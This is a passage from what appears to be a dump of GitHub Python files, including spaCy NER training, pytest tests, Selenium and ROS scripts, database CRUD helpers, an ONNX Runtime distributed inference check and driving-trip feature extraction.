\n\n# Load the spaCy English language model\nnlp = spacy.load(\"en_core_web_sm\")\n\n# Sample data with labeled football teams and players\njson_file = open('tweets2.json', encoding=\"utf8\")\ndata = json.load(json_file)\n\ntraining_data = []\nfor tweet in data:\n text = tweet['text']\n players = tweet['all_players']\n teams = tweet['all_teams']\n entities = []\n \n for player in players:\n start_idx = text.find(player)\n end_idx = start_idx + len(player)\n if start_idx != -1:\n entities.append((start_idx, end_idx, \"player\"))\n\n # Extract team entities and their spans\n for team in teams:\n start_idx = text.find(team)\n end_idx = start_idx + len(team)\n if start_idx != -1:\n entities.append((start_idx, end_idx, \"team\"))\n \n training_data.append((text, {\"entities\": entities}))\n \n\n# Prepare the data for training\ntexts = [data[0] for data in training_data]\nannotations = [data[1] for data in training_data]\n\n# Create a blank \"en\" model with the ner component\nnlp_ner = spacy.blank(\"en\")\nner = nlp_ner.add_pipe(\"ner\") # spaCy v3: add_pipe creates and returns the component in one step\n\n# Add the labeled entity annotations to the NER model\nfor _, annots in training_data: # renamed so the 'annotations' list above is not shadowed\n for ent in annots.get(\"entities\"):\n ner.add_label(ent[2])\n\n# Disable other pipeline components during training\nother_pipes = [pipe for pipe in nlp_ner.pipe_names if pipe != \"ner\"]\n\n# Training the NER model\nwith nlp_ner.disable_pipes(*other_pipes):\n optimizer = nlp_ner.begin_training()\n for _ in range(20): # You can adjust the number of iterations here\n losses = {}\n for text, annots in zip(texts, annotations):\n example = Example.from_dict(nlp_ner.make_doc(text), annots) # v3 update() consumes Example objects, not raw text/dicts\n nlp_ner.update([example], drop=0.5, sgd=optimizer, losses=losses)\n print(losses)
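\n\n# Editor's sketch: a fuller spaCy v3 loop would shuffle and minibatch the Example\n# objects ('examples' below is a hypothetical pre-built list, not a name from this file):\n#   import random\n#   from spacy.util import minibatch\n#   random.shuffle(examples)\n#   for batch in minibatch(examples, size=8):\n#       nlp_ner.update(batch, drop=0.5, sgd=optimizer, losses=losses)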
\n\n# Test the trained NER model with some examples\ntest_data = [\n \"Neymar is a skillful player.\",\n \"Arsenal is one of the top teams in England.\"\n]\n\nfor text in test_data:\n doc = nlp_ner(text)\n entities = [(ent.text, ent.label_) for ent in doc.ents]\n print(f\"Text: {text}\\nEntities: {entities}\\n\")\n","repo_name":"danielbaltruschat/transfer_rumours_server","sub_path":"nlp/unused/player_team_labeller.py","file_name":"player_team_labeller.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38177406744","text":"import os\nimport requests\nimport pytest\nimport requests_mock\nfrom tests import FIXTURES_PATH\nfrom matrix_parse.main import parse_matrix, matrix_walker, get_matrix\nimport json\nimport asyncio\n\nEXPECTED_OUTPUT_M4X4 = [\n 10, 50, 90, 130,\n 140, 150, 160, 120,\n 80, 40, 30, 20,\n 60, 100, 110, 70,\n]\n\nEXPECTED_OUTPUT_M5X3 = [\n 50, 90, 130, 140, 150,\n 160, 170, 180, 190, 80,\n 70, 60, 100, 110, 120\n]\n\nEXPECTED_OUTPUT_M6X6 = [\n 1, 2, 3, 4, 5, 6,\n 7, 8, 9, 10, 11, 12,\n 13, 14, 15, 16, 17, 18,\n 19, 20, 21, 22, 23, 24,\n 25, 26, 27, 28, 29, 30,\n 31, 32, 33, 34, 35, 36\n]\n\n\n@pytest.mark.parametrize(\n \"fixture,matrix_data_path\",\n [\n (\"matrix_4x4.txt\", 'matrix_data_4x4.json'),\n (\"matrix_5x3.txt\", 'matrix_data_5x3.json'),\n ('matrix_6x6.txt', 'matrix_data_6x6.json')\n ],\n)\ndef test_parse_matrix(fixture, matrix_data_path):\n with requests_mock.Mocker() as mocker:\n with open(os.path.join(FIXTURES_PATH, fixture)) as fixture:\n mocker.get('https://fix.ture', text=fixture.read())\n\n content = requests.get('https://fix.ture').text\n\n with open(os.path.join(FIXTURES_PATH, matrix_data_path)) as matrix_data:\n assert parse_matrix(content) == json.load(matrix_data)\n\n\n@pytest.mark.parametrize(\n \"matrix_data_path,expected_output\",\n [\n (\n 'matrix_data_4x4.json',\n EXPECTED_OUTPUT_M4X4,\n ),\n (\n 'matrix_data_5x3.json',\n EXPECTED_OUTPUT_M5X3,\n ),\n (\n 'matrix_data_6x6.json',\n EXPECTED_OUTPUT_M6X6,\n )\n ],\n)\ndef test_matrix_walker(matrix_data_path: str, expected_output):\n with open(os.path.join(FIXTURES_PATH, matrix_data_path)) as matrix_data:\n assert matrix_walker(json.load(matrix_data)) == expected_output\n","repo_name":"LilDrugHill/task-avito-tech-python-trainee-assignment","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3984340508","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport math\nimport time \n\nlink = \"http://suninjuly.github.io/get_attribute.html\"\n \n\ntry:\n def calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\n browser = webdriver.Chrome(executable_path=r'/home/sinegubov/environments/chromedriver')\n browser.get(link)\n\n Pict = browser.find_element_by_id(\"treasure\")\n \n Pict_value = Pict.get_attribute(\"valuex\")\n \n y = calc(Pict_value)\n\n input1 = browser.find_element_by_css_selector(\"input#answer\")\n input1.send_keys(y)\n\n checkbox = browser.find_element_by_css_selector(\"input#robotCheckbox\")\n checkbox.click()\n button2 = browser.find_element_by_css_selector(\"input#robotsRule\")\n button2.click()\n button = browser.find_element_by_xpath(\"//button[@class='btn btn-default']\")\n button.click()\n\nexcept Exception as error:\n\tprint(f'An error occurred, here is why: {error}')\nfinally:\n # leaves time to copy the answer code within 30 seconds\n time.sleep(10)\n # close the browser after all the steps\n browser.quit()\n #driver.close()\n #driver.quit()\n \n# don't forget to leave a blank line at the end of the file\n","repo_name":"Sinegubov/Stepik-Selenium","sub_path":"Lessons_2/lesson2_1_step7.py","file_name":"lesson2_1_step7.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16099831554","text":"''' An introduction to recursion '''\n'''\nRecursion is an advanced topic. In Python it is not used all that often, because Python's\nidiom can usually fall back on simple loop constructs instead of recursion.\nStill, it is a rather useful technique that the reader should know about.\nIt is simply a function calling itself.\n'''\n\n# ILLUSTRATIVE EXAMPLE\ndef cal_sum(lst):\n if not lst: # equivalent to: if len(lst) == 0:\n return 0\n else:\n return lst[0] + cal_sum(lst[1:])\n\ncal_sum([1, 2, 3, 4])\ncal_sum([1, 2, 3, 4, 5])
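\n\n# Editor's sketch: for contrast, the plain-loop style the note above says Python favours:\n# def cal_sum_loop(lst):\n#     total = 0\n#     for x in lst:\n#         total += x\n#     return total  # or simply: sum(lst)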
\n\n# Recursion, Python style\n# Recursion and loops","repo_name":"nhatgiau/PythonwithZaooo-coban-","sub_path":"bai22.py","file_name":"bai22.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29578829708","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import Pose\nfrom move_base_msgs.msg import MoveBaseActionResult\nx = 0;\nnext = False; # NB: shadows the built-in next(); kept to preserve the original interface\ndef result_callback(data):\n global next # assign the module-level flag, not a new local\n next = True;\n return;\n\ndef nextObjective():\n global x # x is module-level state; without this, x = x+10 raises UnboundLocalError\n objective = PoseStamped();\n x = x+10;\n objective.pose.position.x = x;\n objective.pose.position.y = 0;\n objective.pose.position.z = 0;\n return objective;\n\ndef trajectoire(pub):\n global next # needed because next is reassigned below\n if(next):\n objective = nextObjective();\n next = False;\n pub.publish(objective);\n return;\n\n\ndef waypoint_follow():\n pub = rospy.Publisher('/move_base_simple/goal', PoseStamped, queue_size=10)\n rospy.Subscriber(\"/move_base/result\",MoveBaseActionResult,result_callback);\n rospy.init_node('waypoint_follow', anonymous=True)\n rate = rospy.Rate(10) # 10hz\n while not rospy.is_shutdown():\n trajectoire(pub);\n rate.sleep();\n\nif __name__ == '__main__':\n try:\n waypoint_follow()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"fifinani/ROB_MOB","sub_path":"catkin_ws/src/waypoint_follow/scripts/waypoint_follow.py","file_name":"waypoint_follow.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16099831554","text":"from databases import Database\nfrom sqlalchemy import and_\nfrom typing import List\nimport logging\n\nfrom core.database.helpers import build_model_from_row, write_db\nfrom core.database.tables.indicator import get_indicator_table\nfrom core.models.indicator import IndicatorInModel, IndicatorModel\nfrom core.enums.statuses import BottifyStatus\n\nindicator_table = get_indicator_table()\n\n\nasync def create_indicator(database: Database, indicator_in: IndicatorInModel):\n if not isinstance(indicator_in, IndicatorInModel):\n logging.error(\n f\"Create Indicator:Input must be IndicatorInModel:Got: {type(indicator_in)}\"\n )\n return False\n\n query = indicator_table.insert()\n return await write_db(database, query, indicator_in.dict())\n\n\nasync def read_indicator_by_id(database: Database, indicator_id: int):\n if not isinstance(indicator_id, int):\n logging.error(\n f\"Read Indicator by ID : ID must be an Int : Got {type(indicator_id)}\"\n )\n return None\n query = (\n indicator_table.select().where(indicator_table.c.id == indicator_id).limit(1)\n )\n row = await database.fetch_one(query)\n return build_model_from_row(row, IndicatorModel)
\n\n\nasync def read_all_indicators(database: Database, limit: int):\n indicators = []\n if not isinstance(limit, int):\n logging.error(f\"Read All Indicators:Input Must be an Int - Got: {type(limit)}\")\n return indicators\n query = indicator_table.select().limit(limit)\n async for row in database.iterate(query):\n indicators.append(build_model_from_row(row, IndicatorModel))\n if not indicators:\n logging.error(f\"Read All Indicators:No Results\")\n return indicators\n\n\nasync def read_indicators_by_strategy_id(\n database: Database, strategy_id: int, limit: int\n):\n indicators = []\n if not isinstance(strategy_id, int):\n logging.error(\n f\"Read Indicators By Strategy ID : Strategy ID Must be an Int - Got: {type(strategy_id)}\"\n )\n return indicators\n if not isinstance(limit, int):\n logging.error(\n f\"Read Indicators By Strategy ID : Limit Must be an Int : Got {type(limit)}\"\n )\n return indicators\n query = (\n indicator_table.select() # was indicators.select(), which called .select() on the empty result list\n .where(indicator_table.c.strategy_id == strategy_id)\n .limit(limit)\n )\n async for row in database.iterate(query):\n indicators.append(build_model_from_row(row, IndicatorModel))\n if not indicators:\n logging.error(f\"Read Indicators By Strategy ID : No Results\")\n return indicators\n\n\nasync def read_indicators_by_strategy_ids(\n database: Database, strategy_ids: List[int], limit: int\n):\n indicators = []\n\n query = (\n indicator_table.select()\n .where(indicator_table.c.strategy_id.in_(strategy_ids)) # pass the list itself; [strategy_ids] nested it inside another list\n .limit(limit)\n )\n async for row in database.iterate(query):\n indicators.append(build_model_from_row(row, IndicatorModel))\n if not indicators:\n logging.error(f\"Read Indicators By Strategy IDs : No Results\")\n return indicators\n\n\nasync def read_active_indicators_by_definition_id(\n database: Database, definition_id: str\n):\n indicators = []\n\n query = indicator_table.select().where(\n and_(\n indicator_table.c.definition_id == definition_id,\n indicator_table.c.status == BottifyStatus.Active.value,\n )\n )\n async for row in database.iterate(query):\n indicators.append(build_model_from_row(row, IndicatorModel))\n if not indicators:\n logging.error(\n f\"Read Active Indicators By Definition ID : No Results : Definition ID {str(definition_id)}\"\n )\n return indicators\n\n\nasync def update_indicator_status_by_strategy_id(\n database: Database, strategy_id: int, new_status: BottifyStatus\n):\n if not isinstance(new_status, BottifyStatus):\n logging.error(\n f\"Update Indicator Status By Strategy ID : New Status Must be Type BottifyStatus - Got: {type(new_status)}\"\n )\n query = (\n indicator_table.update()\n .where(indicator_table.c.strategy_id == strategy_id)\n .values(status=new_status.value)\n )\n success = await write_db(database, query)\n if not success:\n logging.error(f\"Update Indicator Status By Strategy ID : Write DB Failure\")\n return success\n\n\nasync def update_indicator_status_by_definition_id(\n database: Database, definition_id: int, new_status: BottifyStatus\n):\n if not isinstance(new_status, BottifyStatus):\n logging.error(\n f\"Update Indicator Status By Definition ID : New Status Must be Type BottifyStatus - Got: {type(new_status)}\"\n )\n query = (\n indicator_table.update()\n .where(indicator_table.c.definition_id == definition_id)\n .values(status=new_status.value)\n )\n success = await write_db(database, query)\n if not success:\n logging.error(f\"Update Indicator Status By Definition ID : Write DB Failure\")\n return success\n","repo_name":"Kroonjay/Bottify","sub_path":"core/database/crud/indicator.py","file_name":"indicator.py","file_ext":"py","file_size_in_byte":4998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36127005246","text":"import re\nfrom ftrace.common import ParserError\nfrom .register import register_parser\nfrom .binder import parse_binder_cmd\nfrom collections import namedtuple\n\nTRACEPOINT = 'binder_update_page_range'
\n\n__all__ = [TRACEPOINT]\n\n#binder_update_page_range: proc=3624 allocate=1 offset=4096 size=8192\n\nBinderUpdatePageRangeBase = namedtuple(TRACEPOINT,\n [\n 'proc',\n 'allocate',\n 'offset',\n 'size'\n ]\n)\n\nclass BinderUpdatePageRange(BinderUpdatePageRangeBase):\n __slots__ = ()\n def __new__(cls, proc, allocate, offset, size):\n\n return super(BinderUpdatePageRange, cls).__new__( # conventional arg order; the original super(cls, BinderUpdatePageRange) breaks under subclassing\n cls,\n proc=proc,\n allocate=allocate,\n offset=offset,\n size=size\n )\n\nbinder_update_page_range_pattern = re.compile(\n r\"\"\"\n proc=(\\d+)\\s+\n allocate=(\\d+)\\s+\n offset=(\\d+)\\s+\n size=(\\d+)\n \"\"\",\n re.X|re.M\n)\n\n@register_parser\ndef binder_update_page_range(payload):\n \"\"\"Parser for `binder_update_page_range`\"\"\"\n try:\n match = re.match(binder_update_page_range_pattern, payload)\n if match:\n match_group_dict = match.groupdict()\n return BinderUpdatePageRange(int(match.group(1)), int(match.group(2)), int(match.group(3)), int(match.group(4)))\n except Exception as e:\n raise ParserError(e.message)\n","repo_name":"corakwue/ftrace","sub_path":"ftrace/parsers/binder_update_page_range.py","file_name":"binder_update_page_range.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"53"} +{"seq_id":"21451551585","text":"# -*- coding: utf-8 -*-\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def countNodes(self, root):\n \"\"\"\n Solution: BFS\n Time Complexity: O(n)\n Space Complexity: O(n)\n Perf: Runtime: 140 ms, faster than 9.88% / Memory Usage: 27.6 MB, less than 5.41%\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if not root: return 0\n stack = [root]\n count = 0\n while stack:\n r = stack.pop(0)\n count += 1\n if r.left:\n stack.append(r.left)\n if r.right:\n stack.append(r.right)\n return count","repo_name":"jerrt2003/leetcode-in-python","sub_path":"222_Count_Complete_Tree_Nodes/BFS.py","file_name":"BFS.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40246608434","text":"from flask import Flask, request, render_template, redirect, Blueprint\nimport models as mo\nimport json\n\nbp = Blueprint('word', __name__, url_prefix='/word')\n\nreviewService = mo.ReviewService()\nmapService = mo.MapService()\n\n@bp.route('/main', methods=['POST', 'GET'])\ndef word_main():\n closeSiteList = mapService.getCloseSiteList()\n return render_template('word/main.html', closeSiteList=closeSiteList)\n\n@bp.route('/word_info', methods=['POST', 'GET'])\ndef word_info():\n searchWord = request.form['word']\n myWordList = reviewService.keword_similar(searchWord) # needed by both the graph and the review service\n reviewService.keyword_recommend(myWordList)\n myGraphVec = reviewService.keywordScatterGraph(myWordList, searchWord)\n\n # Bring in PCA so these vectors can be visualized.\n # The raw dimensionality is far too high to visualize how the words occupy the embedding space.\n # PCA is the usual way to reduce word-embedding dimensions for visualization.\n from sklearn.decomposition import PCA\n pca = PCA(n_components=2) # visualize in 2D\n xy_axis = pca.fit_transform(myGraphVec) # reduce the word-embedding dimensions (one per word) down to two (x axis, y axis)\n x_axis = xy_axis[:, 0] # x axis\n y_axis = xy_axis[:, 1] # y axis\n\n import matplotlib.pyplot as plt\n # set up a Korean font for matplotlib\n from matplotlib import font_manager, rc\n font_path = \"C:/Windows/Fonts/H2GTRM.TTF\" # Korean gothic font\n font = font_manager.FontProperties(fname=font_path).get_name()
\n rc('font', family=font) # set the Korean font\n\n import plotly # plotly: prettier than other graphing libraries\n import plotly.graph_objects as go\n\n fig = go.Figure(data=go.Scatter(x=x_axis, # x axis\n y=y_axis, # y axis\n mode='markers+text',\n text=myWordList))\n\n fig.update_layout(title=f'Word Trip {searchWord} Word2Vec')\n\n import plotly.io as pio # I/O library\n\n graph = pio.to_json(fig) # serialize the figure to JSON\n graph = graph.encode('utf-8') # encode the Korean text (str -> bytes)\n graph = graph.decode('unicode_escape') # decode it back to readable Korean\n\n # needed when handing the JSON to the HTML template\n # (note: 'graph' is already JSON text at this point, so dumps() wraps it in one quoted string)\n graphJSON = json.dumps(graph, ensure_ascii=False , cls=plotly.utils.PlotlyJSONEncoder)\n\n return render_template('word/wordInfo.html', graphJSON=graphJSON)\n\n@bp.route('/detail/<guname>', methods=['POST', 'GET']) # route parameter restored; the <...> converter was stripped in extraction\ndef detail(guname):\n a = guname\n b = reviewService.mapReview(a)\n return render_template('word/wordInfo.html', b=b, guname=guname)\n\n@bp.route('/detail/detail/<place_name>', methods=['POST', 'GET']) #'/attraction/detail/3'\ndef get(place_name):\n p = reviewService.getAttrByName(place_name)\n r = reviewService.getAttrByReview(place_name)\n return render_template('word/detail.html', p=p, r=r)","repo_name":"crystal993/Word_trip","sub_path":"final_travel_project/route_update/word_route.py","file_name":"word_route.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27832231581","text":"import argparse\nimport os\nimport pprint\nimport sys\nfrom pathlib import Path\n\nimport onnxruntime\nimport torch\nfrom transformers import LlamaConfig, LlamaForCausalLM, LlamaTokenizer\n\n\ndef _run_pytorch(model, inputs):\n return model(**inputs)\n\n\ndef _mpipool_worker(args):\n filepath, local_rank, world_size, inputs = args\n\n os.environ[\"OMPI_COMM_WORLD_RANK\"] = str(local_rank)\n os.environ[\"OMPI_COMM_WORLD_SIZE\"] = str(world_size)\n\n from mpi4py.MPI import COMM_WORLD\n\n local_rank = COMM_WORLD.Get_rank()\n COMM_WORLD.barrier()\n\n print(f\"rank: {local_rank}, filepath: {filepath}\")\n\n session = onnxruntime.InferenceSession(\n filepath,\n providers=[\"CUDAExecutionProvider\"],\n provider_options=[{\"device_id\": str(local_rank)}],\n )\n return session.run(None, inputs)[0]\n\n\ndef _run_onnx(filepath, world_size, inputs):\n from mpi4py.futures import MPIPoolExecutor\n from mpi4py.MPI import COMM_WORLD\n\n args = [(filepath.format(rank), rank, world_size, inputs) for rank in range(world_size)]\n with MPIPoolExecutor(max_workers=world_size) as executor:\n outputs = executor.map(_mpipool_worker, args)\n executor.shutdown()\n\n COMM_WORLD.barrier()\n\n return list(outputs)\n\n\ndef _main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--filename-pattern\",\n dest=\"filename_pattern\",\n type=str,\n help=\"Onnx model file name pattern to use for distributed run\",\n )\n parser.add_argument(\"--world-size\", dest=\"world_size\", type=int, help=\"World size for distributed run\")\n parser.add_argument(\n \"--compare\",\n dest=\"compare\",\n action=\"store_true\",\n default=False,\n help=\"Compare results from distributed session to non-distributed session\",\n )\n parser.add_argument(\"--debug\", action=\"store_true\", default=False, help=\"Enable debug output\")\n args = parser.parse_args()\n\n model_id = \"meta-llama/Llama-2-7b-hf\"\n prompt = \"Is it normal to have a dark ring around the iris of my eye?\"\n device = \"cuda\"\n\n tokenizer = LlamaTokenizer.from_pretrained(model_id)\n tokens = tokenizer(prompt, 
return_tensors=\"pt\")\n tokenizer = None\n\n config = LlamaConfig.from_pretrained(model_id)\n num_heads, head_size = config.num_key_value_heads, config.hidden_size // config.num_key_value_heads\n batch_size, past_seq_len = 2, 0\n\n model = LlamaForCausalLM.from_pretrained(model_id, torch_dtype=config.torch_dtype, config=config)\n model.to(device)\n model.eval()\n model.requires_grad_(False)\n\n position_ids = tokens.attention_mask.long().cumsum(-1) - 1\n position_ids.masked_fill_(tokens.attention_mask == 0, 1)\n\n pytorch_inputs = {\n \"input_ids\": tokens.input_ids.to(device),\n \"attention_mask\": tokens.attention_mask.to(device),\n \"position_ids\": position_ids.to(device),\n }\n pytorch_outputs = _run_pytorch(model, pytorch_inputs)\n\n if args.debug:\n with (Path.cwd() / \"pytorch_output.txt\").open(\"wt\") as strm:\n pprint.pprint(pytorch_outputs, stream=strm)\n strm.flush()\n\n onnx_inputs = {\n \"input_ids\": tokens.input_ids.numpy(),\n \"attention_mask\": tokens.attention_mask.numpy(),\n \"position_ids\": position_ids.numpy(),\n }\n for i in range(config.num_hidden_layers):\n onnx_inputs[f\"past_key_values.{i}.key\"] = torch.rand(\n batch_size, num_heads, past_seq_len, head_size, dtype=torch.float32\n ).numpy()\n onnx_inputs[f\"past_key_values.{i}.value\"] = torch.rand(\n batch_size, num_heads, past_seq_len, head_size, dtype=torch.float32\n ).numpy()\n\n onnx_outputs = _run_onnx(args.filename_pattern, args.world_size, onnx_inputs)\n\n if args.debug:\n with (Path.cwd() / \"onnx_output.txt\").open(\"wt\") as strm:\n pprint.pprint(onnx_outputs, stream=strm)\n strm.flush()\n\n if args.compare and (pytorch_outputs is not None) and (onnx_outputs is not None):\n import numpy as np\n\n pytorch_outputs = pytorch_outputs[\"logits\"].cpu().numpy()\n\n results = {}\n for i in range(args.world_size):\n results[f\"pytorch vs. onnx_{i:02d}\"] = np.fabs(np.median(pytorch_outputs - onnx_outputs[i]))\n\n if i > 0:\n results[f\"onnx_00 vs. 
onnx_{i:02d}\"] = np.fabs(np.median(onnx_outputs[0] - onnx_outputs[i]))\n\n if args.debug:\n pprint.pprint(results)\n\n atol = 1e-4\n if not np.all(np.array(list(results.values())) < atol):\n raise RuntimeError(\"Inference test failed!\")\n\n print(\"Inference test completed successfully!\")\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(_main())\n\n\n# python3 inference.py \\\n# --filename-pattern model_{:02d}.onnx \\\n# --world-size 2\n# [--debug]\n#\n# python3 inference.py \\\n# --filename-pattern model_{:02d}.onnx \\\n# --world-size 2 \\\n# [--compare] \\\n# [--debug]\n","repo_name":"Physolia/OLive","sub_path":"examples/llama2/tensor_parallel_inference.py","file_name":"tensor_parallel_inference.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74413001768","text":"import sqlite3\n\n# Conexión a la base de datos (se creará si no existe)\nconn = sqlite3.connect(\"prueba.db\")\n\n# Crear un cursor para interacturar con la base de datos\ncursor = conn.cursor()\n\n# Crear una tabla llamada usuarios con tres columnas: id, nombre y edad\ncursor.execute('''CREATE TABLE IF NOT EXISTS usuarios (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n nombre TEXT NOT NULL,\n edad INTEGER\n )''')\n\n# Guardar los cambios y cerrar la conexión\nconn.commit()\nconn.close()\n\nconn = sqlite3.connect(\"prueba.db\")\n\ncursor = conn.cursor()\n\ncursor.execute(\"INSERT INTO usuarios (nombre, edad) VALUES (?, ?)\", (\"Juan\", 21))\n\nconn.commit()\nconn.close()\n\n","repo_name":"JezrrelValles/Aprendiendo-Python-3-Nivel-Intermedio","sub_path":"api/base_datos_prueba.py","file_name":"base_datos_prueba.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18984065752","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 11 16:56:50 2020\r\n\r\n@author: penghui\r\n\"\"\"\r\nimport pyautogui as pi\r\n#import time\r\nimport pyperclip as pp\r\nfrom os import getcwd\r\nname = pi.prompt(title='请输入txt名字(在浏览器界面下填写并点击确定)')\r\nname_txt = 'url_'+name\r\n#time.sleep(2)\r\ni = 1\r\nsite_list = []\r\nwhile(i>0):\r\n pi.moveTo(600,50,2)\r\n #time.sleep(3)\r\n pi.click(button='left')\r\n pi.hotkey('ctrl', 'a')\r\n pi.hotkey('ctrl','c')\r\n #获取粘贴板内容\r\n site = pp.paste()\r\n print(site)\r\n if site in site_list:\r\n break\r\n else:\r\n site_list.append(site)\r\n #切换tab\r\n pi.hotkey('ctrl', 'PgDn')\r\n#写入到txt\r\n#name = 'openurl'+time.strftime(\"%m{m}%d{d}%H:%M:%S\", time.localtime()).format(m='月',d='日')\r\n\r\ndirurl = getcwd()+'/url_'+name+'.txt'\r\nf = open(dirurl,'w')#a\r\nsite_list_len = len(site_list)\r\nfor item in site_list:\r\n f.write(item+'\\n')\r\n#一定不能忘记\r\nf.close()\r\npi.alert(\"已经将当前窗口的\"+str(site_list_len)+\"个标签页写入到\"+name_txt+\".txt\")\r\n#","repo_name":"slowlyideal/Selenium","sub_path":"网址的自动保存与打开/saveurl.py","file_name":"saveurl.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8135820309","text":"import numpy as np\nfrom read_data import read_trips\nimport sys\nimport scipy as sp\nfrom scipy.signal import savgol_filter\n\ndef smooth_low(arr):\n arr = np.array(arr, copy=True)\n for i, a in enumerate(arr):\n if np.dot(a, a) < 1:\n arr[i] = np.array([0, 0])\n return arr\n\ndef smooth(arr, n=75):\n xs = arr[:,0]\n ys = arr[:,1]\n xdft = np.fft.rfft(xs)\n ydft = np.fft.rfft(ys)\n xdft[n:] = [0]\n ydft[n:] = 
\n xsm = np.fft.irfft(xdft)\n ysm = np.fft.irfft(ydft)\n return np.vstack((xsm, ysm)).T\n\ndef smooth2(arr):\n xf = savgol_filter(arr[:,0], 5, 2)\n yf = savgol_filter(arr[:,1], 5, 2)\n return np.vstack((xf, yf)).T\n\n\ndef grad2d(arr):\n return np.vstack((np.gradient(arr[:,0]), np.gradient(arr[:,1]))).T\n\ndef compute_scalar(a):\n a_complex = a[:,0] + a[:,1]*1j\n return np.absolute(a_complex)\n\ndef compute_velocity(position):\n jag_velocity = grad2d(position)\n #velocity = smooth_low(smooth(jag_velocity))\n velocity = smooth2(jag_velocity)\n return velocity\n\ndef compute_acceleration(velocity):\n return grad2d(velocity)\n\ndef n_step_diff(arr, n=2):\n res = np.zeros(arr.shape)\n for i, a in enumerate(arr):\n j = i - n\n res[i] = a - arr[max(j, 0)]\n return res\n \ndef acceleration_features(velocity, angle_dt, cos_dt, speed=None):\n if speed is None:\n speed = compute_scalar(velocity)\n\n avg_speed = np.mean(speed)\n max_speed = np.max(speed)\n min_speed = np.min(speed)\n total_time = float(len(speed))\n four_speed = (speed[0:-4:4] + speed[1:-3:4] + speed[2:-2:4] + speed[3:-1:4])/4 # average 4 consecutive samples at stride 4; the original slices had stop and step swapped, yielding empty arrays\n\n fast_speed = 25\n slow_speed = 4\n \n fast = speed > fast_speed\n time_fast = np.sum(fast)\n slow = speed < slow_speed\n time_slow = np.sum(slow)\n\n n_bins = 100 \n speed_bins = np.hstack((np.linspace(0, 40, n_bins), np.inf))\n speed_hist, outside = np.histogram(speed, bins=speed_bins)\n n_speed_hist = speed_hist/total_time\n\n four_speed_bins = np.hstack((np.linspace(0, 40, n_bins), np.inf))\n four_speed_hist, outside = np.histogram(four_speed, bins=four_speed_bins)\n n_four_speed_hist = four_speed_hist/total_time\n \n fraction_fast = time_fast/total_time\n fraction_slow = time_slow/total_time\n\n stationary = speed < 0.5\n stops = np.sum(stationary)\n fraction_stationary = stops/total_time\n\n acc_bins = np.hstack((-np.inf, np.linspace(-10, 10, n_bins), np.inf))\n scalar_acc = np.gradient(speed)\n acc_hist, bins = np.histogram(scalar_acc, bins=acc_bins)\n n_acc_hist = acc_hist/total_time\n\n acc2_bins = np.hstack((-np.inf, np.linspace(-5, 5, n_bins), np.inf))\n scalar_acc2 = np.gradient(scalar_acc)\n acc2_hist, bins = np.histogram(scalar_acc2, bins=acc2_bins)\n n_acc2_hist = acc2_hist/total_time\n\n angle_dt_speed = speed * angle_dt\n angle_bins = np.hstack((-np.inf, np.linspace(-50, 50, n_bins), np.inf))\n angle_hist, b = np.histogram(angle_dt_speed, bins=angle_bins)\n n_angle_hist = angle_hist/total_time\n\n angle_dt_acc = scalar_acc*angle_dt\n angle_bins = np.hstack((-np.inf, np.linspace(-50, 50, n_bins), np.inf))\n acc_angle_hist, b = np.histogram(angle_dt_acc, bins=angle_bins)\n n_acc_angle_hist = acc_angle_hist/total_time\n\n cos_dt_speed = speed * cos_dt\n cos_bins = np.hstack((-np.inf, np.linspace(0, 40, n_bins), np.inf))\n cos_hist, b = np.histogram(cos_dt_speed, bins=cos_bins)\n n_cos_hist = cos_hist/total_time\n\n max_acc = np.max(scalar_acc)\n avg_acc = np.mean(scalar_acc * (scalar_acc > 0))\n max_dec = np.max(np.abs(scalar_acc * (scalar_acc < 0)))\n avg_dec = np.mean(np.abs(scalar_acc * (scalar_acc < 0)))\n feats1 = np.array([total_time, \n time_fast,\n time_slow,\n fraction_fast,\n fraction_slow,\n stops,\n fraction_stationary])\n #return np.hstack((feats1, n_speed_hist, n_angle_hist, n_cos_hist, n_acc_angle_hist))\n return np.hstack((feats1, n_speed_hist, 